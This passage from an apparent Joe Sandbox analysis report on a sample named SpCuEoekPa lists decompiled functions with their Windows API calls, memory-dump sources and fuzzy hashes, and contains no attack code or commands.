                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
                                                            • Instruction ID: 80cfe6c10feeb007a31ed7f04cc7e92686aa0ef63bc83ad3f18c18e035b3df71
                                                            • Opcode Fuzzy Hash: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
                                                            • Instruction Fuzzy Hash: F88152B16043009FD722EF18D886B2AB7E9AF59710F04891EF9559F3D2DA71AC408B51
                                                            Function 0038541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction ID: 8f25456cb4f95a7e602415a32a972dabac365bfbc413d7dc428e341e0b819b97
                                                            • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                            • Instruction Fuzzy Hash: C651D731A00B05DBDF27AF79D84066E77A6AF41321F2587A9F836972D0D770DE948B40
                                                            Function 003E0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E00FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003E0183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 003E01AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 003E01BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
                                                            • Instruction ID: b56d4c06c590a449241c291f873ab227db1fb457493e661e29cad25d081c3461
                                                            • Opcode Fuzzy Hash: b2ec9005fdafc5e3fe516cdc5df72aca0d9c214c1cda5070505050fb15c474fc
                                                            • Instruction Fuzzy Hash: 51515D71208244AFD716EF54C881F6AB7E9FF84314F408A2DF5958B2A2DB71ED44CB52
                                                            Function 003DD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DD927
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 003DD9AA
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 003DD9C6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 003DDA07
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 003DDA21
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                              • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
                                                            • Instruction ID: dbaec1b07539e4d3ec4c016e540d148a2c7ecdd856b0ae26b8d21db4ecf69390
                                                            • Opcode Fuzzy Hash: 7e286c04e03e7b8fee20c5d81d3292f173c95ca74f4d6ec9e1e78a4ccb9c05b9
                                                            • Instruction Fuzzy Hash: 0C511636A00209DFCB12EFA8D4949ADB7F8EF19320B05C16AE855AB352D731AD45CF90
                                                            Function 003CE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003CE61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003CE648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003CE687
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003CE6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003CE6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: 4026f584652faa7046055c69aae0ff1e31a4397c0c13430205dfe6978ccc02d6
                                                            • Instruction ID: 1259f4c50b623f0d473334d96adb807cb4af9d824877be4dfa3634d63cafeb44
                                                            • Opcode Fuzzy Hash: 4026f584652faa7046055c69aae0ff1e31a4397c0c13430205dfe6978ccc02d6
                                                            • Instruction Fuzzy Hash: 4151FB35A00205DFCB16EF64C981AAEBBF9EF09314F1484A9E909AF365CB31ED15DB50
                                                            Function 003EA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
                                                            • Instruction ID: b68b191bb3f0d31290d6aabb6cacdf6ac0946b6811f311c64e1ab2ed785b1dc7
                                                            • Opcode Fuzzy Hash: a19c4389e071883da456547849b8c72f5ac072599b5de5d72b00046c792ebb31
                                                            • Instruction Fuzzy Hash: A141F9359049A4AFD722DF35CC88FE9BBA8EB09310F164365F816A72E0C770BD41DA51
                                                            Function 00362344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00362357
                                                            • ScreenToClient.USER32(004257B0,?), ref: 00362374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00362399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 003623A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
                                                            • Instruction ID: 09c722ec55f47f616409745a836232665f062037b4718b9751b9e6d963911129
                                                            • Opcode Fuzzy Hash: 228b5621eaf85de4347ca92a2c2609ec985d0ba81412b12df33121f4b726866b
                                                            • Instruction Fuzzy Hash: 19418039604619FFCF278F68C844AEEBB78BB05360F21835AF829962D0C7349950DB91
                                                            Function 003B63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B63E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 003B6433
                                                            • TranslateMessage.USER32(?), ref: 003B645C
                                                            • DispatchMessageW.USER32(?), ref: 003B6466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B6475
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
                                                            • Instruction ID: 4a80da508d733d2516dc40980a4d414bb7be264d4c619dec004de08ebbd280fa
                                                            • Opcode Fuzzy Hash: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
                                                            • Instruction Fuzzy Hash: BE310631600A42DFDB328F71CC46BF67BACAB01308F550175E625C78A2E7789845CB60
                                                            Function 003B8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 003B8A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 003B8ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003B8AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 003B8AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003B8AF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
                                                            • Instruction ID: 79d3397cd51049d19cce5fc0168d15d4a3a7e4bb9ec2705c2e31106621492d72
                                                            • Opcode Fuzzy Hash: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
                                                            • Instruction Fuzzy Hash: 3A31D171500259EFDF15CF68D98CADE7BB9EB04319F108229FA24EA6D0C7B09910CB90
                                                            Function 003BB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 003BB204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003BB221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003BB259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003BB27F
                                                            • _wcsstr.LIBCMT ref: 003BB289
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: c73b39fa279b24cb9b89b1a72c78d06d83b3dcf1b2b9e88c10fe9e803dcfe1ac
                                                            • Instruction ID: e12cdc944abdb379aad504944a4471e9d9a7d147eb34a897ac49c48ef3f89dba
                                                            • Opcode Fuzzy Hash: c73b39fa279b24cb9b89b1a72c78d06d83b3dcf1b2b9e88c10fe9e803dcfe1ac
                                                            • Instruction Fuzzy Hash: A821D331204240ABEB276B799C49ABFBB9CDF49710F014179F904DE5A1EFA1DC409360
                                                            Function 003EB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003EB192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003EB1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003EB1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 003EB1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003D0E90,00000000), ref: 003EB216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
                                                            • Instruction ID: 0de6004efe1229762fcf3ccf6bc777da8a4ad59d530286f7944aaa03909c6221
                                                            • Opcode Fuzzy Hash: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
                                                            • Instruction Fuzzy Hash: A42171716106A5AFCB229F399C44A6B77A8EB06371F114B34A922D71E0D77098219B90
                                                            Function 003B9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003B9320
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9352
                                                            • __itow.LIBCMT ref: 003B936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9392
                                                            • __itow.LIBCMT ref: 003B93A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
                                                            • Instruction ID: 0bfe4002464c99d5af2dc685e2fd76dd910cb9766f8d0ae3ffa854e7c7dd51a1
                                                            • Opcode Fuzzy Hash: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
                                                            • Instruction Fuzzy Hash: 4521B335700208BBDB12AA658CC5FEE7BADEF49718F044026FB499B2D1D6B089458791
                                                            Function 003D5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 003D5A6E
                                                            • GetForegroundWindow.USER32 ref: 003D5A85
                                                            • GetDC.USER32(00000000), ref: 003D5AC1
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 003D5ACD
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 003D5B08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
                                                            • Instruction ID: ce9cae060b9622a7de74bca99de91c47a6a254f83f01340b29167f3d30d3d33c
                                                            • Opcode Fuzzy Hash: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
                                                            • Instruction Fuzzy Hash: 1A216F76A00114AFDB15EF65D884A9ABBE9EF48350F14C57AF809DB362DA70AD00CB90
                                                            Function 003612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0036134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0036135C
                                                            • BeginPath.GDI32(?), ref: 00361373
                                                            • SelectObject.GDI32(?,00000000), ref: 0036139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
                                                            • Instruction ID: f721bf70ff9c17989c1679ea05acfdfedc3e377f3a84c045a573eafead12d079
                                                            • Opcode Fuzzy Hash: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
                                                            • Instruction Fuzzy Hash: E721B634900608DFDB22AF25DD447697BE8FB00321F688225F4119A6B4D3F099A2DF54
                                                            Function 003BBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: 7bc00aefba215b18ffd7c56f6e2e971afdc586f2832b4320a251fc9b179577cf
                                                            • Instruction ID: f4265c2f51fe418067a5b0e95bef8aece41ef840b1a6cd3e7f64584f5fb301e8
                                                            • Opcode Fuzzy Hash: 7bc00aefba215b18ffd7c56f6e2e971afdc586f2832b4320a251fc9b179577cf
                                                            • Instruction Fuzzy Hash: 68019271601209BBD206AB129D42FFBF76CDE1078CB044025FF059BB42EFD0DE1182A0
                                                            Function 003C4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 003C4ABA
                                                            • __beginthreadex.LIBCMT ref: 003C4AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 003C4AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003C4B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003C4B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
